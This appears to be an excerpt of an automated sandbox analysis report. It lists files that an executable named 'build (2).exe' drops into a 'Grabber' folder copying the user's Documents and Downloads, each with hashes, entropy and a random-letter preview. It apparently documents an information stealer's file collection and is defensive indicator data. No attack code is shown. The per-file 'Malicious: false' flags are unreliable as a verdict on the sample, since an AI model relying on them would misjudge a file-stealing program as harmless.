Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\NEBFQQYWPS.png

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\QCFWYSKMHA.png

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\SFPUSAFIOL.pdf

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH.docx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\IPKGELNTQY.jpg

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\MXPXCVPDVN.xlsx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\NEBFQQYWPS.png

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\SFPUSAFIOL.pdf

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\UOOJJOZIRH.docx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\GAOBCVIQIJ.jpg

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
